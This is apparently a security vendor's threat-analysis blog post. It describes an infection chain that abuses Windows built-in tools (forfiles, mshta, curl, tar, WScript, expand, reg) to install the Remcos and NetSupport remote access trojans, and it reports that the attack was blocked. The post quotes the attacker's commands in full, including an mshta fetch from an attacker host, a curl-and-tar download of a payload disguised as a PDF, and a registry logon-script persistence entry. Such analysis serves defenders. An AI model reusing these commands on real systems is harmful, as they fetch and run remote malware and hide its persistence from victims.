Can you use too many LOLBins to drop some RATs?

Recently, our team came across an infection attempt that stood out—not for its sophistication, but for how determined the attacker was to take a “living off the land” approach to the extreme. The end goal was to deploy Remcos, a Remote Access Trojan (RAT), and NetSupport Manager, a legitimate remote administration tool that’s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows’ built-in utilities—known as LOLBins (Living Off the Land Binaries). Both Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.

The attack kicked off with a seemingly odd command: C:\Windows\System32\forfiles.exe /p c:\windows\system32 /m notepad.exe /c "cmd /c start mshta https:[attacker-ip]/web". By roping in forfiles.exe, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. Following this, the mshta command fetched a remote HTA file that immediately spawned cmd.exe, which rolled out an elaborate PowerShell one-liner: powershell.exe -NoProfile -Command curl -s -L -o "<random>.pdf" (attacker-ip}/socket; mkdir "<random>"; tar -xf "<random>.pdf" -C "<random>"; Invoke-CimMethod Win32_Process Create "<random>\glaxnimate.exe". PowerShell’s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, tar.exe unpacked it into a randomly named folder. The star of this show, however, was glaxnimate.exe—a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows’ own tools—no EXE droppers or macros in sight.

Next, the malicious Glaxnimate copy began writing partial files to C:\ProgramData: SETUP.CAB.PART, PROCESSOR.VBS.PART, PATCHER.BAT.PART. This is classic malware staging. Once fully written, Windows Script Host was invoked to execute the VBScript component: "C:\Windows\System32\WScript.exe" "C:\ProgramData\processor.vbs". The VBScript used IWshShell3.Run to silently spawn cmd.exe with a hidden window so the victim would never see a pop-up or black box. The batch file’s job was to expand setup.cab -F:* C:\ProgramData, using the expand utility to extract all the contents of the previously dropped setup.cab archive into ProgramData—effectively unpacking the NetSupport RAT and its helpers. To make sure their tool survived a restart, the attackers opted for the stealthy registry route: reg add "HKCU\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\PATCHDIRSEC\client32.exe" /f. Unlike old-school Run keys, UserInitMprLogonScript isn’t a usual suspect and doesn’t open visible windows.

This infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows’ own tools against its users. Every step of the way relies on built-in Windows tools: forfiles, mshta, curl, tar, scripting engines, reg, and expand. The more tools a threat actor abuses, the more unique their fingerprints become. Stay vigilant. Monitor potential LOLBin abuse. And never trust a .pdf that needs tar.exe to open. Despite the heavy use of LOLBins, this attack was detected and blocked. The attacker’s IP address was blocked and both the Remcos RAT and the NetSupport client were detected once dropped on the system.

To read the complete article see: Link to full article